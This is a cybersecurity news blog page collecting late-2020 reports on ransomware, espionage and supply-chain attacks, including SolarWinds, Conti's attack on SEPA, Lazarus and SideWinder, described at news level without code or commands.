Search This Blog

Showing posts with label Cyber Attacks. Show all posts

Threat Actors Demand Ransom After Major Cyber Attack on Scottish Environmental Protection Agency

 

Scottish Environment Protection Agency (SEPA) said its digital systems have been severely affected by a ransomware attack since Christmas Eve. Threat actors have locked agency's emails and contact centers and are demanding a ransom to unlock them.

National Cyber Security Centre and Scotland Police are investigating the whole incident and it is believed that the international cybercriminal group is behind the ransomware attack. Cybersecurity experts have unearthed that threat actors have stolen nearly 1.2 GB of data which suggests threat actors may have accessed and stolen 4,000 files.

SEPA said they have to start from scratch and build a whole new system following a ‘significant cyber-attack’. Agency further stated that essential services regarding food forecasting and warnings have not been hit by cyber-attack. Though it remains highly unlikely that 1,300 employees will be able to secure access to their old emails and online documents.

Scotland’s environmental regulator has termed this attack as an “incredibly sophisticated attack” and warned threat actors to face the consequences. We are aware that threat actors are demanding a ransom to unlock the agency's system but they will not succeed in their plan.

SEPA’s Chief Executive Terry A’ Hearn stated that “whilst we don’t know and may never know the full detail of the 1.2 GB of information stolen, what we know is that early indications suggest that the theft of information related to several business areas, some of the information stolen will have been publicly available”. 

The Conti ransomware group asserted the attack and has already leaked sensitive information on its site. The stolen information includes personal information associated with SEPA employees and information associated with commercial work with international allies.

Technology and Software Giants, Microsoft and Google face Threat by Chimer Gang Attack

 


The world's biggest technology and software giants, namely Microsoft, and Google are being threatened by a new group of cybercriminals who are targeting their cloud services. Working in coordination with their Chinese interests, the threat actors are attacking a wide range of organizations with the intent of exfiltrating data. 

The security researcher, NCC Group and Fox-IT, taking account of this incident said that these attackers have a “wide set of interest” and their target data ranges from the intellectual property belonging to the victims in the semiconductor Industry to the commuter data from the airways industry. 

The actors that are targeting these giants are referred to as Chimer by CyCraft. This group named Chimera is not new for the cyber industry, instead, they have been engaged in such incidents from the year 2019 till the year 2020. However, on every such occasion, they have managed to escape the situation without garnering much attention. “Our threat intelligence analysts noticed a clear overlap between the various cases in infrastructure and capabilities, and as a result we assess with moderate confidence that one group was carrying out the intrusions across multiple victims operating in Chinese interests”, added the team of researchers.

The team of researchers briefly explained the scheme of attackers while targeting such organizations. These actors commence their threat process by accessing the username and passwords from the victim’s previous data breaches. They then use the credentials of the victims in credential stuffing or password spray attacks against assorted remote services. Moving ahead, as they obtain the valid accounts of the victims, they use it to access the victim’s VPN, Citrix, or any other remote service with this network access. After entering their network, the actors try to accept all the permissions and get the list of other accounts with the admin privileges. Now they target other accounts from the list and then try their password spraying attack on these accounts. They do this until any other account is compromised by their attack. Lastly, they use this account to load a Cobalt Strike beacon into the memory which later can be used for remote access and command and control (C2). 

Following the incident, the security researchers affirmed that they have contained and eradicated the threat from their clients’ network. They further added that “NCC Group and Fox-IT aim to provide the wider community with information and intelligence that can be used to hunt for this threat in historic data and improve detections for intrusions by this intrusion set”.

Password Guessing Used as a Weapon by SolarWinds Hackers to Breach Targets

 

Cybersecurity and Infrastructure Security Agency (CISA) informed that perpetrators of SolarWinds attack obtained confidential information via common hacker techniques like password guessing, password spraying, and illicitly acquired administrative credentials attainable via external remote access services.

The hackers manipulated the IT management company SolarWinds update to secure unauthorized entrance to government systems. The perpetrators inserted malware into an update the company shared with thousands of its clients which then initiated a command and directed the channel to an external server. Microsoft stated that the hacker’s primary aim was to secure entrance to cloud hosted infrastructure, which at many instances was possessed by the company’s Azure and Microsoft 365 environments. 

The threat actors behind the SolarWinds hack gained access by password guessing [T1101.001], password spraying [T1101.003] and were not consistently counting on the trojanized Orion app as its primary access vector.

CISA has urged the United States government agencies to upgrade the SolarWinds Orion platform to the latest version 2020.2.1HF2 and the agencies that are not willing to upgrade the SolarWinds Orion platform should take their Orion systems offline. The attackers modified several Orion app versions to attach malware and used a malware strain called Sunburst (or Solorigate) to corrupt the Orion app updates, versions 2019.4 via 2020.1 which were released between March 2020 and June 2020.

“CISA has evidence that there are initial access vectors other than the SolarWinds Orion platform and has identified legitimate account abuse as one of these vectors (for details refer to Initial Access Vectors section), specifically, we are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens consistent with the adversary’s behavior is present, yet where impacted SolarWinds instances have not been identified” the agency stated.

The SolarWinds hack was first discovered by the US Cybersecurity company FireEye on December 8th when the cybersecurity firm released a blog revealing an attack on its systems and the attack have impacted the highest authorities of United States which includes the Department of Homeland Security, Department of Commerce, US Treasury and parts of the Pentagon. The hackers were believed to be from Russia, based on several pieces of evidence, however, Russia constantly denies the allegations. 

Security Analysis: The Rise of Cybercrime Underworld and Hacking Groups

During the Covid-19 pandemic, educational institutions, health agencies, and other significant organizations have suffered the most from cyberattacks. As if this was not enough, a massive wave of cyberattacks have risen against these institutions,  a new hacking group has emerged which uses modern techniques to attack its targets. The troublesome part is that these hackers are using an operational structure that is not very uncommon in the hacking underworld. Known as "Egregor," the hacking group has attacked more than 130 targets in recent months. 

The victims include logistics companies, schools, health agencies, the manufacturing industry, and financial agencies. The working of Egregor is similar to other ransomware, i.e. keeping hold of the data until the client pays the ransom money. There is but one minor change, Egregor's methods reveal the present structure of the hacking economy.  Instead of depending solely on lone wolfs (hackers) that orchestrate massive data breaches, or dark web platforms abundant with Russian threat actors, the hackers today work as a kind of unified group/team which acknowledges innovations and changes in the hacking industry. 

In other words, one can say that is a replica of Silicon Valley, but one that thrives on exploiting agencies for profit rather than building interactivity. Cybersecurity expert Jason Passwaters, CEO, Intel 471, says that there exist hackers which were active a long time ago and are still in the hacking game. They offer the same services as they used to back in the time, but the only change is now these hackers rely on each other, rather than working solely. Cybersecurity experts suggest that there might be up to 12 hackers involved in a data breach or a commodity cyberattack. The Egregor group isn't the only one. 

Hacking groups like Thanos, Conti, and SunCrypt that use similar malware strains, have also started operating in a cooperative way.  Cyberscoop reports, "it’s a style with roots in the mid-2000s when a hacker using the name “slavik” released the Zeus malware, a hacking tool that helped accelerate what’s known now as an affiliate model. The FBI has identified a Russian man, Evgeniy Bogachev, as “slavik,” and has listed him on the bureau’s list of most wanted fugitives. Bogachev’s Zeus malware is responsible for financial losses of more than $100 million, the FBI says, even as the creator has posed in ostentatious outfits in social media pictures." 

Check Point: What to expect from hackers in 2021

The pandemic has made its own adjustments in all areas of modern life. The attackers changed the targets of their attacks, choosing new priority areas of hacking, including focusing on the medical industry. Founder and CEO of information security company Check Point Software Technologies Gil Shwed told how hacker attacks have changed in the pandemic and what to expect from cybercrime in the future.

Gil Shwed suggested that in 2021, first, since the coronavirus and the fight against it will continue to bother humanity, then pharmaceutical companies working on the development of vaccines and medicines will most likely be attacked.

Secondly, while schoolchildren and students study from home, most likely, hackers will be interested in distance learning systems as well.

Third, it can be expected that botnets will increasingly be used in attacks. Hackers have already transformed many existing malicious applications into botnets to create entire armies of infected computers for cyber attacks.

The fourth expected point is that cyberwarfare will be at the global level.

Mr. Shwed noted that attacks on hospitals, research laboratories, especially during the period of COVID-19 are an opportunity for attackers to get ransom or attention.

The goals of cybercriminals who attack medical institutions can be different - both obtaining financial gain, and causing harm, and gaining widespread publicity. For example, medical records are sold in Darkweb for up to $1,000 per record.

In addition, medical devices such as insulin injectors, heart monitors, and pacemakers can be targeted.  

Check Point researchers have demonstrated the ease with which an ultrasound machine running on an old Windows operating system can be hacked, revealing an entire database of patient images. Unsurprisingly, there has been a 75% increase in ransomware attacks on healthcare facilities in recent months.

Microsoft's researchers said that hackers from only three countries carried out 89% of national cyberattacks this year. Attacks were extremely common, and their target was events of various levels, from elections to the Olympic Games. And also in 2021, the active use of deepfakes is expected.

Earlier E Hacking News reported that Russian hackers gained access to the source codes of Microsoft programs and systems. The organization assured that there is no reason to believe that hackers gained access to services for maintenance of its products or to customer data.

Russian hackers gained access to the source codes of Microsoft programs and systems

Microsoft believes that hackers who previously attacked US government departments and businesses have gained access to internal information about its software code.

Microsoft is among the clients of the US firm SolarWinds, whose systems were hacked earlier this year. On December 17, Microsoft representatives admitted that "malicious SolarWinds code was detected in its ecosystem, it was isolated and removed."

The company's specialists reported that "one account was used to view program code in a number of repositories."

As it became known earlier, the Orion software of SolarWinds was hacked in March of this year. Hackers managed to inject the virus into the Orion update, which was then downloaded and used by thousands of SolarWinds customers, including leading government agencies, as well as more than 400 major American companies.

In a joint statement released last week, the Office of the US Director of National Intelligence, the FBI and the Infrastructure and Cybersecurity Agency said they had documented a major attack on the federal government's computer networks.

US Secretary of State Michael Pompeo outlined the version according to which Russia was involved in the attack. Meanwhile, US President Donald Trump stressed that the media exaggerated the scale of the incident.

Press Secretary of the Russian President Dmitry Peskov said that Moscow was not involved in hacker attacks on US government agencies and companies.

Experts agree that by raising the topic of cyber attacks, the new US administration is preparing the ground for another package of anti-Russian sanctions. This can be both the introduction of sanctions and a cyber attack, for example, on the main state institutions, says Konstantin Blokhin, a researcher at the Center for Security Research of the Russian Academy of Sciences. And the fact that Trump did not blame Russia does not mean a change in Washington's foreign policy.

A similar point of view is expressed by the political scientist-Americanist Mikhail Sinelnikov-Orishak. "This is a great reason to accuse Moscow of interfering in internal affairs, to justify any measures, since it is impossible to determine exactly who is behind these attacks. In addition, this is a good justification for allocating additional funds from the budget for the cyberspace," said the political scientist.

Hackers Demand Ransom After Major Cyber-Attack on the Antwerp Laboratory


Algemeen Medisch Laboratorium bvba, (AML) in the Antwerp district of Hoboken was attacked by hackers; the laboratory manages about 3,000 Covid-19 tests daily, which is about 5% of the nation's total. The cyberattacks amid the outbreak of Coronavirus have rampantly increased over the past year and this attack was nothing new but yet another addition to the newly surfaced theme of malware and ransomware attacks in the context of 'COVID-19'. 
 
Hackers attacked the laboratory website by installing ransomware into it, it brought the website to a standstill. As we have seen in the past as well in the case of ransomware attacks - the hackers are demanding a ransom before releasing the website from confinement. 
 
ICT manager Maarten Vanheusden has said, “that after detailed analysis by our security teams, it was decided to disengage the network as a safety measure and by this way we can see what exactly is infected”. He also said by this time there is no information of data being stolen and that they are taking all the precautionary measures. Furthermore, the origins of the attack remain unknown as of now. The traces linked back the hackers to China, Russia, and Iran.  
 
AML is the largest private lab in the country which is dealing with the COVID-19 problem. There is no clarity regarding the purpose of the attack, speculations could not exactly suggest that whether the hackers attacked the laboratory merely for ransom or they have other plans as well as data theft. The case is being handled by the federal Computer Crimes Unit after the lab reported the attack to the Antwerp prosecutor`s office. 
 
This is the second time in December that hackers have attacked the sites related to the Covid-19 pandemic. European Medicines Agency (EMA) was targeted in a cyber-attack; EMA is responsible for assessing and approving vaccines for the European Union. German biotech firm BioNTech said, “that the agency was attacked and some documents which were related to the regulatory submission for Pfizer and BioNTech’s Covid-19 vaccine had been unlawfully accessed". 
 
Hackers are targeting many healthcare and medical organizations especially during this Covid-19 outbreak for demanding ransom as well as to obtain the classified information related to the vaccines.

Crypto Trading App Voyager Hit By Cyberattack, Company Shuts Down Website

 

Cryptocurrency brokerage platform Voyager stopped its operations on 28th December after it suffered a  cyberattack that disrupted its DNS configuration. Voyager Digital LLC is a cryptocurrency is a brokerage platform where an investor can trade their assets with the help of the Voyager mobile app. The company has shown rapid growth in the year 2020, increasing its growth by 40x times in the last 12 months. Not only this, Voyager currently holds under management $200 million in assets. On 28th December, Voyager's online platform had to shut down due to, as per the press release "currently undergoing maintenance." 

The company later revealed that it had suffered a cyberattack which led to the closing and canceling of all limit orders. Steve Ehrlich, Co-founder, and CEO of Voyager said in a press release that "customer funds and security are of the utmost importance to Voyager. Whilst all funds and crypto are secure we have had to temporarily halt trading on the platform and we sincerely apologize for the inconvenience and thank our clients for their patience." 

The team at voyager had no trouble finding the intrusion, the moment it was detected, the team shut down the systems to save client information and assets.  After the cyberattack, the Voyager app is now online, and all the tradings on the website are now back to normal. To assure cybersecurity, Voyager signed out all its users from the app and has advised them to change their login credentials and reset 2-step verification (2fa). As of now, there is not much detail about how the cyberattack happened other than a tweet that mentioned that it was a DNS attack. 

"With a highly experienced team that has previously built successful online brokerages, we know the importance of having robust and highly secure systems to counter cyber attacks. With our rapid growth to date bringing the business into the spotlight, we are fully prepared for such events and in this case, have acted swiftly to prevent any impact on the business," says Voyager press release. 

Kaspersky has reported hacker attacks on COVID-19 researchers

The hacker group Lazarus attacked the developers of the coronavirus vaccine: the Ministry of Health and a pharmaceutical company in one of the Asian countries

Kaspersky Lab reported that the hacker group Lazarus has launched two attacks on organizations involved in coronavirus research. The targets of the hackers, whose activities were discovered by the company, were the Ministry of Health in one of the Asian countries and a pharmaceutical company.

According to Kaspersky Lab, the attack occurred on September 25. Hackers used the Bookcode virus, as well as phishing techniques and compromising sites. A month later, on October 27, the Ministry of Health servers running on the Windows operating system was attacked. In the attack on the Ministry, according to the IT company, the wAgent virus was used. Similarly, Lazarus previously infected the networks of cryptocurrency companies.

"Two Windows servers of a government agency were compromised on October 27 by a sophisticated malware known to Kaspersky Lab as wAgent. The infection was carried out in the same way that was previously used by the Lazarus group to penetrate the networks of cryptocurrency companies," said Kaspersky Lab.

Both types of malware allow attackers to gain control over an infected device. Kaspersky Lab continues its investigation.

"All companies involved in the development and implementation of the vaccine should be as ready as possible to repel cyber attacks," added Kaspersky Lab.

The Lazarus group is also known as APT38. The US Federal Bureau of Investigation (FBI) reported that their activities are sponsored by the DPRK authorities.

Recall that in July, the National Cyber Security Centre (NCSC) and similar departments of the United States and Canada accused the hacker group APT29, allegedly associated with the Russian special services, in an attempt to steal information about the coronavirus vaccine. Dmitry Peskov, press secretary of the Russian President, denied the Kremlin's involvement in the break-ins.

SolarWinds Cyberattacks, Microsoft's Turn?

 

The United States is witnessing major cyberattacks, multiple government departments’ agencies are being targeted including treasury and commerce departments, homeland security and now Microsoft is the latest victim of a cyber attack. 

The ‘SolarWinds hack’ has emerged as one of the biggest cyberattacks against the US government, its agencies, and several other private companies, so much so that it has been said the world is under global cyber attack.  

According to Microsoft’s president, Brad Smith, more victims are expected to surface as investigations continue. 

Government departments and private organizations all across the globe are facing difficulties in disabling the compromised SolarWinds products from their systems. 

Intelligences investigating the matter, have named the hack ‘Sunburst’, saying that it will take years to fully decipher these cyber-attacks including the attack vectors and the origin. In this regard, Smith further stated, “We should all be prepared for stories about additional victims in the public sector and other enterprises and organizations.” 

Furthermore, he said that Microsoft has already notified 40 of its security customers that its products are being found to be compromised. The malicious actors are seen to be targeting them “more precisely and breaching the security through additional and sophisticated measures". Experts have predicted the continuity of the attacks, saying more victims are likely to come up. 

As per the researchers, approximately 80 percent of these customers were located in the United States, while others were from Mexico and Canada in North America, Spain, Belgium, and the United Kingdom in Europe, and UAE and Israel in the Middle East. 

Attackers have targeted the government agencies, security and other technology firms, and private organizations of the abovementioned nations. 

However, above all, the campaign is “effectively an attack on the United States and its government and other critical institutions,” Smith warned. So far, six federal entities have been attacked: the Department of Energy, The Pentagon, the National Institute of Health, the Department of Homeland Security the Department of Treasury, and the Department of Commerce. 

The information about the attack has come from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) as the agency warned government and non-government agencies that there could be additional initial-access vectors, beyond the SolarWinds Orion platform. 

Sources from Reuters told that the malicious actors used Microsoft’s Azure cloud as part of their attacks, however, a Microsoft spokesperson denied this by saying that “there are no indications that our systems were used to attack others’’

Spear-Phishing Campaigns Targeting Tibet and Taiwan

 

Tibetan community is being targeted by a Spear-phishing campaign; it is suspected that malicious actors behind these operations are the ones formerly involved in campaigns attacking Taiwanese legislators as discovered in May 2020 during an investigation. Reportedly, the group is employing a novel malware variant called MESSAGEMANIFOLD, similar to the one employed in the abovementioned campaigns, further solidifying the links discovered between both the campaigns. 

Several other overlaps have also been noted between both the activities, including the application of the same email themes and identical hosting provider. Furthermore,  both the campaigns made use of Google Drive links for downloading the malware. 

The campaigners are attacking strategic targets that somehow align with the Chinese Government’s affairs. The threat actors used spear-phishing emails with the theme ‘conference invitations’, which included a direct download Google Drive link. According to the researchers two Google Drive links were there, with the name “dalailama-Invitations [.]exe” file. 

About the Attacks

The dropped files (HTTP POST) were being used for the requests to communicate with the control and command server which uses a fixed URL pattern, and for the next stage, malware needs a specific response. Those domains were being used in both campaigns were organized on AS 42159 (Zemlyaniy Dmitro Leonidovich) and AS 42331 (PE Freehost). 

Recent cyberattacks on Taiwanese and Tibetan entities don't come as a surprise, it has been observed that Beijing-based malicious actors actively attack these states in accordance with their state interests. A recent study at IBM disclosed that an email phishing scheme attacking Germany and Italy based COVID-19 vaccine supply chains. Other targets included the Czech Republic and South Korea amid a few more. 

Given the highly customized nature of the attacks against particular targets chosen strategically, the activity could possibly be aligned with Chinese nation-backed attackers; however, as of now, the campaigns could not be affiliated to a recognized cyber threat group. Therefore, experts have recommended employing a trustworthy anti-malware solution. Users are also advised to avoid opening attachments from anonymous sources. 

Russian embassy responds to Norwegian allegations of cyberattack

Hacker groups APT28 and Fancy Bear may have been involved in a cyber attack on the Norwegian Parliament in August 2020. This statement was made on Tuesday by the Norwegian Police Security Service.

Police say the operation was likely carried out by cyber groups, known publicly as APT28 and Fancy Bear. According to them, they are connected with the Russian military intelligence GRU, and more specifically with its main headquarters for special operations.

The Russian Embassy in Norway expressed on Facebook on Tuesday the opinion that Norway's accusations of Russia in hacker attacks without providing evidence are unacceptable and do not contribute to strengthening the dialogue.

"Accusations without evidence in a highly likely regime are unacceptable. Unlike Norwegian politicians, Russia is careful to maintain a dialogue with Norway and even more cherish the centuries-old friendship and cooperation with the Norwegian people,” stressed they.

"One more request to journalists and experts — if you comment on any statements of the special services, follow the professional code, namely: do not publish hastily the" hottest" news if you have no evidence,“ concluded the Embassy.

On September 1, the Parliament of the Kingdom reported that it was subjected to a cyber attack, as a result of which unknown hackers gained access to the email of a number of deputies and employees of the legislative body. According to Marianne Andreassen, the administrative head of the Parliament, a number of immediate measures were taken to stop the attack. The Norwegian Police Security Service later said it would investigate whether "any state" was behind the cyber attack that occurred on August 24.

Norwegian Foreign Minister Ine Eriksen Søreide made a statement that Russia was behind the cyber attack on parliament.

Spy Campaign: SideWinder APT Leverages South Asian Border Disputes


The SideWinder advanced persistent threat (APT) group, which seems to be active since 2012, now has started a new malicious activity, wherein the threat actors are leveraging the rising border disputes between developing states namely India-China, India-Nepal, and Nepal-Pakistan. 

The aim of this phishing and malware initiative is to gather sensitive information from its targets, mainly located in two territories, Nepal and Afghanistan. A recent study says the SideWinder group primarily targets victims in South Asia and its surroundings, interestingly this latest campaign is no exception. 

According to the researchers, this phishing and malware initiative is targeting multiple government and military units for countries in the region. The Nepali Ministries of Defense and Foreign Affairs, the Nepali Army, the Afghanistan National Security Council, the Sri Lankan Ministry of Defense, the Presidential Palace in Afghanistan are its prime targets, to name a few. 

Malicious actors are targeting Webmail login pages aimed at harvesting credentials. Actual webmail login pages were copied from their victims and subsequently are being used for phishing, as per the Trend Micro researchers. For instance, “mail-nepalgovnp[.]duckdns[.]org”,  which appears the legitimate domain of Nepal's government, however, it is just tricking people into believing so. 

The Catch

When the users “log in”, they are either directly sent to the actual login pages or redirected to different news pages, documents, which can be related either to political fodder or COVID-19. Researchers noted that some of the pages also include articles titled “China has nothing to do with India, India should see that. Similarly, many articles are being used which includes hot topics from recent ongoing issues between states. 

Cyber Espionage: No Limits? 

"We also found multiple Android APK files on their phishing server. While some of them are benign, we also discovered malicious files created with Metasploit," researchers wrote on Wednesday. They also identified several Android APK files on the phishing server, some of these files were made using Metasploit. 

Reportedly, SideWinder is a very proactive group that made headlines for attacking mobile devices via Binder exploit. This Year many states were being attacked, namely Bangladesh, China, and Pakistan, using files of Corona Virus. 


UAE Faces Cyber Pandemic, Cyberattacks In The Middle East On The Rise


The Middle East is suffering a "cyber pandemic" crisis due to coronavirus-themed cyberattacks on the rise this year, says Mohamed al-Kuwaiti, United Arab Emirates government's cybersecurity chief. Moving into a full online life, UAE witnessed an increase in cyberattacks, he further says. The UAE saw a record 250% increase in cybersecurity attacks in 2020. The pandemic compelled companies across the globe to look inside assess their assets, as criminal actors preyed on the digital world. 

"Al Kuwaiti said discussions were ongoing regarding lifting the ban on some Voice over Internet Protocol (VoIP) services in the UAE, such as WhatsApp and FaceTime calling," reports CNBC. Al Kuwaiti says that UAE became a primary target of attacks by the activists when it recently tied formal relations with Israel. Criminals targeted health and financial sectors in particular. The news provides a more in-depth insight into the troublesome cybersecurity challenges UAE and Middle East faces. In these regions, cyberattacks and breaches are prospering; most of these state-sponsored and undetected. According to Al Kuwaiti, various sources were behind this attack. Although the attacks come from all over the region, the main actor is Iran, he says. 

The issue reveals ongoing tension in the area, whereas Iran says that it is a target of cyberattacks. However, the Iranian foreign ministry has not offered any comments on the issue. Al Kuwaiti says that "phishing" and "ransomware" attacks are on the rise; these attacks have become more sophisticated and frequent. In a phishing attack, the hacker pretends to be a legitimate person or entity and steals sensitive information from the victim. Whereas in a ransomware attack, the hacker blocks access to information and demands a ransom from the victim. 

The latest research by cybersecurity firm TrendMicro says government IT infrastructures and critical public systems have become one of the primary targets of hackers globally, with ransomware attacks in the trend. According to the report, "current malicious actors have opted to demand heftier ransoms from targets that are more likely to pay, such as healthcare companies and local governments."

Russia was included in the list of countries with the most active hackers

The company Group-IB, which specializes in the disclosure of IT crimes, listed the countries from which cyber attacks are most often committed. This list includes China, Iran, North Korea, and Russia

Hacker attacks are most often carried out from China, Iran, North Korea and Russia, according to the report Hi Tech Crime Trends 2020 of the company Group-IB. The Asia-Pacific region was the most attacked in the second half of 2019 and the first half of 2020.

Groups of hackers associated with the security services are mainly concentrated in China, where they counted 23, in Iran — 8 groups, in North Korea and Russia — 4 groups, in India-3 groups, in Pakistan and the Gaza Strip-2 groups. Another one is in Vietnam, Turkey and South Korea. At the same time, their main area of interest is the Asia - Pacific region, as well as Europe.

According to a report, Russia and the United States were less likely to be attacked. So, 15 campaigns were conducted in the United States and 9 in Russia. They were attacked by groups from China, North Korea and Iran. Russia also recorded one attack by Kazakhstan's security services and the United States - from the Gaza Strip and Pakistan.

Experts note that the attacking teams are actively replenished with tools for attacks on physically isolated networks. So, this year, incidents occurred at nuclear facilities in Iran and India.

Another high-profile attack was a sabotage attempt in Israel, where water supply systems were targeted, where hackers tried to change the level of chlorine content. 

Hackers attacked major Telegram channels via video on Yandex

 On November 10, hackers conducted a major attack on popular Telegram channels. Reddit's administrators completely lost access to the channel, to which 236 thousand people were subscribed. The attackers used the old scheme: they simply sent the Trojan-infected file to the administrators

Hackers stole the Telegram channel of the Reddit forum, administrators could not log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to the channel.

The hackers had the following scheme: they offered to buy advertising space, but first they asked to watch a video with their materials, which could be downloaded from Yandex.Disk. The document could not be opened on a mobile device, and hackers offered to download it to a desktop computer.

After launching the file, the owner of the Reddit channel with 236 thousand subscribers was no longer able to access it.

General Director of the lab Studio.AG Artem Geller explained that this is a very old method of fraud, and Windows is an object for such files. Hackers, under various pretexts, send material containing malware. It allows access to the entire operating system if the victim opens the file. In this particular case, the attackers were interested in Telegram, so the Reddit account was stolen.

Can't blame Yandex.Disk for missing the Trojan. According to Geller, about 300,000 new viruses appear every day in the world, so it's simply impossible to catch them all. Moreover, it may not be a new virus, but a modification of the old one. At the same time, the Trojan has no task to destroy the computer system.

Cloud storage is a convenient way for fraudsters, because they can upload a file of any size there, unlike email. Unprotected, unencrypted files without passwords are loaded into these vaults.

According to the information security expert Alexander Vlasov, we must remember one thing: those who provide the service for free, never sign up to the fact that they will protect your files. Yes, they are trying to track malware, but within the general outline of the ecosystem.

Iranian Hacker Group Using New Tools to Target Government Agencies of Broader Middle East Region

 

In the part of their attacks on companies and government agencies in the broader Middle East region, an Iranian cyberattack group has begun utilizing new tools, including a custom download utility and commodity ransomware, as per Broadcom's Symantec division. 

Dubbed as Seedworm, the group gives off an impression of being deploying a few variations of a new downloader, known as PowGoop, to the recent targets.

The utilization of the noxious program doesn't demonstrate a shift to ransomware-based cybercrime for the group, yet rather a reception of a more extensive variety of strategies for countering defensive measures. 

The software downloads and decrypts 'obfuscated' PowerShell scripts to run on compromised frameworks, utilizing the basic utility as an approach to execute code. 

The researchers additionally state that the group is sending ransomware, known as Thanos, which previously appeared available to be purchased not long ago and gives off an impression of being utilized by Seedworm for its 'destructive capacities'.

"Looking at Seedworm's history, it is apparent they've been focused on Middle East-based government organizations for years," "We don't believe that they are directly focused on monetary gain. From our standpoint, the Thanos victim organizations [represent] very few [targets] — just a handful at the most," says Vikram Thakur, Symantec's technical director. 

The researchers were moderately sure, nonetheless, in ascribing PowGoop to the Iranian state actor.

"Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East," Symantec researchers stated in their analysis.  
"While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm's part. Any organizations that do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation." 

"There is nothing sophisticated about PowGoop aside from it being custom-made and that it uses multiple layers of encoded PowerShell scripts to effectively download and execute PS-based payloads," Thakur added later.

PowGoop has additionally been identified by various other companies. Security firm Palo Alto Networks associated PowGoop with two ransomware attacks on companies in the Middle East and North Africa at the beginning of September.

Russia considers the accusations by the Norwegian authorities of the cyber attack as a provocation

 Russia considers the accusations by the Norwegian authorities against it in the cyber attack a deliberate provocation. This statement was made on Tuesday by the Russian Embassy in Norway on Facebook.

"We regard the incident as a serious deliberate provocation that is detrimental to bilateral relations,” said the statement.

"Millions of cyber attacks are made annually on Russian state Internet resources (including foreign institutions in Norway) from abroad (for example, 77 million attacks were made on the Foreign Ministry website in January-September 2018), but this does not give the right to accuse the authorities of the countries of their possible origin,” stressed the Embassy.

They pointed out that "in May 2020, a note was sent to the Norwegian Foreign Ministry setting out the procedure for dealing with computer incidents - there are official channels for investigating them." "There was no reaction at the time, which indicates the reluctance of the Norwegian authorities to conduct a dialogue. The question is why did we create specialized response mechanisms and create a legislative framework together with European countries? We expect explanations from the Norwegian side,” said the diplomatic mission.

The head of the Federation Council for International Affairs, Konstantin Kosachev, called the Norwegian government's accusations unsubstantiated. According to him, Oslo did not offer to discuss the incident at the expert level.

Earlier on Tuesday, Norwegian Foreign Minister Ine Eriksen Soreide claimed that Russia was behind the cyber attack on the country's Parliament in August 2020.

On September 1, the Parliament of the Kingdom reported that it had been subjected to a cyber attack, as a result of which unknown hackers gained access to the email of a number of deputies and employees of the legislative body. Later, the Norwegian Police Security Service (PST) said it would investigate whether "any state" was behind the cyber attack that occurred on August 24.

Warning Issued to End Cyberattacks Risk Running Afoul of Sanctions Rules by The U.S. Treasury Department

 

The U.S. Treasury Department recently issued a warning to cyber insurers and other financial institutions that 'facilitate payments' to hackers to end cyberattacks hazard crossing paths with sanctions rules. 

The warnings, referred to as 'malignant programs' known as ransomware and came in from Treasury's Office of Foreign Assets Control (OFAC)and Financial Crimes Enforcement Network (FinCEN).

The warnings also added to the additional worries of the cyber insurers, who have been 'ramping up' rates and attempting to control the exposure to vulnerable customers on account of flooding exorbitant ransomware claims as of late.

Hackers utilized ransomware to bring down frameworks that control everything from hospital billing to manufacturing and halted simply in the wake of accepting 'hefty payments', commonly paid in cryptocurrency.

Ransomware payment requests have seen quite a rise amidst the pandemic as people have chosen to work remotely and hackers target online systems. 

The normal ransomware payments bounced by 60% to $178,254 between the first and second quarters, as per Coveware, a firm that arranges and negotiates cyber ransom payoffs. The cyber policies frequently cover such ransoms, data recovery, legitimate liabilities, and arbitrators fluent in hackers' local dialects. 

Sumon Dantiki, a King and Spalding LLC legal advisor who exhorts on national security and cyber matters says that advanced insurers and financial establishments are now mindful of the sanctions concern. “Will victims who are insured still decide to make the payments?” Dantiki said. “This type of public advisory could affect the calculus there.” 

A subsequent FinCEN report even highlighted a developing industry of forensic firms that assist associations with responding to cyberattacks, including handling the payments.

OFAC referred to cyberattacks dating to 2015 that were traced back to hackers in sanctioned nations, like North Korea and Russia.

Nonetheless, while it is clearly evident that the US can force economic and trade sanctions on nations that support terrorism or disregard human rights, it will be the financial institutions that ultimately draw in with them or a few individuals can confront prosecution and penalties in the end.


A Hacker Collective Based in Pakistan, Being Backed by China to Gather Intelligence Against India

 

In a rather coordinated attempt in order to steal strategic data and critical infrastructure by sending phishing mails a campaign was launched by a Pakistan-backed hacker, Transparent Tribe. 

The campaign, dubbed as 'Operation Sidecopy' utilizes a remote access malware that can heighten its privilege in undermined systems, and thus, easily steal data by infiltrating a computer. 

Cyber Security researchers at Seqrite, the cyber security solutions arm of Quick Heal, believe that the main tools utilized in Operation Sidecopy shows the association of Transparent Tribe which Seqrite believes is being backed by China to accumulate insight against India. 

One of the main characteristics that Seqrite believes can be associated with Pakistan's Transparent Tribe is the remote server facilitating that the 'collective uses'. 

As per researchers Kalpesh Mantri, Pawan Chaudhari and Goutam Tripathy at Seqrite, Operation Sidecopy utilizes Contabo GmbH to 'host' the remote server through which the malware is instructed and information inflow is controlled, which Transparent Tribe is accounted for to have done already.

Himanshu Dubey, director of Quick Heal Security Labs, affirmed that alongside the Operation Sidecopy cyber attacks are highly targeted towards India in nature and have been continuously observed since 2019.

'Till now, this attack has been only seen targeting India.The Tactics, Techniques and Procedures (TTPs), as well as Decoy documents that we analysed, were crafted specifically in Indian context,” he says. 

Clarifying the Pakistan and China connection in the series of cyber attacks taken note of, Quick Heal's Dubey says, “We have considered several factors such as infrastructure used for command servers, registered domain naming patterns and recently created domains, command and control server names are similar to the names used by APT36 in past, and APT36’s history of attacks targeting Indian defence organisations.Also, one domain that hosted HTML stager applications is registered to a user in Rawalpindi, Pakistan.” 

 Dubey avows that the entirety of Seqrite's discoveries under Operation Sidecopy have been shared with the authorities of the Indian government in order to assist them with taking proper digital protection steps and forestall loss of important data.